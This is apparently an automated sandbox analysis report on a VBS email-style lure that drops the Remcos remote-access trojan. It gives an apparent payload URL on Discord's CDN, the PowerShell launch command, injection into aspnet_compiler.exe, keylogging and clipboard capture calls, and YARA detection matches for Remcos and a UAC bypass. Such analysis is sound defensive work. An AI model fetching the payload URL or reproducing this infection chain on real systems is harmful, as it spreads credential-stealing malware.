                  Source: powershell.exe, 00000001.00000002.1856785002.000001ED2C5BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79B7EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: powershell.exe, 00000004.00000002.1845746496.000001F79BD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79B7EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: powershell.exe, 00000001.00000002.1856785002.000001ED2B071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79A2A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: wscript.exe, 00000003.00000002.1970796959.000001AD771A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discord
                  Source: wscript.exe, 00000000.00000002.2006687133.00000226EB835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp
                  Source: wscript.exe, 00000000.00000002.2006799938.00000226ED732000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/
                  Source: wscript.exe, 00000003.00000002.1970796959.000001AD771A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attac//
                  Source: wscript.exe, 00000000.00000002.2006687133.00000226EB835000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attac77C
                  Source: wscript.exe, wscript.exe, 00000003.00000002.1970895889.000001AD78C46000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1970895889.000001AD78C40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1295304757166080020/1316684745
                  Source: wscript.exe, 00000003.00000002.1970895889.000001AD78C42000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1970079498.000001AD76E3C000.00000004.00000020.00020000.00000000.sdmp, WO-663071 Sabiya Power Station Project.vbsString found in binary or memory: https://cdn.discordapp.com/attachments/1295304757166080020/1316684745500790864/IGBO.ps1?ex=675bf1ba&
                  Source: powershell.exe, 00000004.00000002.1845746496.000001F79BDA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000004.00000002.1845746496.000001F79BDA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000004.00000002.1845746496.000001F79BDA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: powershell.exe, 00000004.00000002.1845746496.000001F79BD47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79B7EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: wscript.exe, 00000000.00000002.2006799938.00000226ED73A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: powershell.exe, 00000001.00000002.1972857093.000001ED3B0F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1856785002.000001ED2CB73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1920544621.000001F7AA322000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79BDA2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: powershell.exe, 00000001.00000002.1856785002.000001ED2C5BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79B7EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                  Source: powershell.exe, 00000001.00000002.1856785002.000001ED2C5BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1845746496.000001F79B7EB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49730 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000011_2_004099E4
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,11_2_004159C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,11_2_004159C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,11_2_004159C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,11_2_00409B10
                  Source: Yara matchFile source: 7.2.x.exe.4d364f8.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.x.exe.4c458b0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.1856200221.0000000004CAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1856200221.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1856416817.00000000044EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1856200221.0000000004E18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 7832, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 7844, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7916, type: MEMORYSTR

                  E-Banking Fraud

                  barindex
                  Source: Yara matchFile source: 6.2.x.exe.44058b0.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.x.exe.4cbded8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.x.exe.44f64f8.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.x.exe.44f64f8.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.1856416817.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1856416817.00000000045D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.1856416817.00000000044EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.1856200221.0000000004D1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2992445213.0000000000818000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2994921734.000000000239F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1850661302.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 7832, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: x.exe PID: 7844, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7908, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 7916, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0041BB71 SystemParametersInfoW,11_2_0041BB71
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0041BB77 SystemParametersInfoW,11_2_0041BB77

                  System Summary

                  barindex
                  Source: 7.2.x.exe.4d364f8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 6.2.x.exe.44058b0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 6.2.x.exe.44058b0.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.x.exe.4cbded8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 7.2.x.exe.4cbded8.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 7.2.x.exe.4cbded8.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 6.2.x.exe.44f64f8.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 6.2.x.exe.44f64f8.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 6.2.x.exe.44f64f8.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 6.2.x.exe.44f64f8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 7.2.x.exe.4c458b0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000007.00000002.1856200221.0000000004CAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000007.00000002.1856200221.0000000004D9F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000007.00000002.1856200221.0000000004E18000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000007.00000002.1856200221.0000000004D1F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0000000B.00000002.1848888779.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7448, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 7672, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: x.exe PID: 7844, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: aspnet_compiler.exe PID: 7916, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: x.exe.1.dr, -Module-.csLarge array initialization: _206C_202B_206A_206D_200B_200F_202E_200D_206C_206B_206A_202D_200C_200B_202C_202E_200E_200D_200C_200F_206B_202A_200F_202A_202B_202D_202C_200B_200E_200D_200D_206A_200D_202B_200B_206E_206D_202A_206E_200F_202E: array initializer size 126032
                  Source: 1.2.powershell.exe.1ed3b50d5f0.0.raw.unpack, -Module-.csLarge array initialization: _206C_202B_206A_206D_200B_200F_202E_200D_206C_206B_206A_202D_200C_200B_202C_202E_200E_200D_200C_200F_206B_202A_200F_202A_202B_202D_202C_200B_200E_200D_200D_206A_200D_202B_200B_206E_206D_202A_206E_200F_202E: array initializer size 126032
                  Source: 4.2.powershell.exe.1f7aa73e970.0.raw.unpack, -Module-.csLarge array initialization: _206C_202B_206A_206D_200B_200F_202E_200D_206C_206B_206A_202D_200C_200B_202C_202E_200E_200D_200C_200F_206B_202A_200F_202A_202B_202D_202C_200B_200E_200D_200D_206A_200D_202B_200B_206E_206D_202A_206E_200F_202E: array initializer size 126032
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess Stats: CPU usage > 49%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,11_2_004158B9
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_00E71B816_2_00E71B81
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_00E7074A6_2_00E7074A
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 6_2_00E708696_2_00E70869
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_02EC08697_2_02EC0869
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_02EC4C437_2_02EC4C43
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 7_2_02EC1B817_2_02EC1B81
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0041D07111_2_0041D071
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004520D211_2_004520D2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0043D09811_2_0043D098
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0043715011_2_00437150
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004361AA11_2_004361AA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0042625411_2_00426254
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0043137711_2_00431377
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0043651C11_2_0043651C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0041E5DF11_2_0041E5DF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0044C73911_2_0044C739
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004367C611_2_004367C6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_004267CB11_2_004267CB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0043C9DD11_2_0043C9DD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00432A4911_2_00432A49
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00436A8D11_2_00436A8D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0043CC0C11_2_0043CC0C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00436D4811_2_00436D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00434D2211_2_00434D22
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00426E7311_2_00426E73
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00440E2011_2_00440E20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_0043CE3B11_2_0043CE3B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00412F4511_2_00412F45
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00452F0011_2_00452F00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 11_2_00426FAD11_2_00426FAD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00401F66 appears 50 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 004020E7 appears 39 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 004338A5 appears 41 times
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 00433FB0 appears 55 times
                  Source: WO-663071 Sabiya Power Station Project.vbsInitial sample: Strings found which are bigger than 50
                  Source: 7.2.x.exe.4d364f8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 6.2.x.exe.44058b0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 6.2.x.exe.44058b0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.x.exe.4cbded8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 7.2.x.exe.4cbded8.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 7.2.x.exe.4cbded8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 6.2.x.exe.44f64f8.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 6.2.x.exe.44f64f8.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 6.2.x.exe.44f64f8.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 6.2.x.exe.44f64f8.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 7.2.x.exe.4c458b0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 00000007.00000002.1856200221.0000000004CAF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
